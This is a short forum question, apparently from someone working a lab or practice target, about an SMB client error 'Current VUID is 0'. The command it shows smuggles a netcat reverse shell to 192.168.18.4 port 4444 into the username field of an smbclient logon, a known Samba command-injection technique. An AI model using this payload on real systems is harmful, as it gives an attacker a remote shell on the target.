# smb connection not working, "Current VUID is 0"

Tags: smb, samba

I am getting an error that says "Current VUID is 0" no matter what I put in as a command. The command I'm attempting (with my listener properly configured) is:

```
smb: \> logon "/=`nc 192.168.18.4 4444 -e /bin/bash`"
```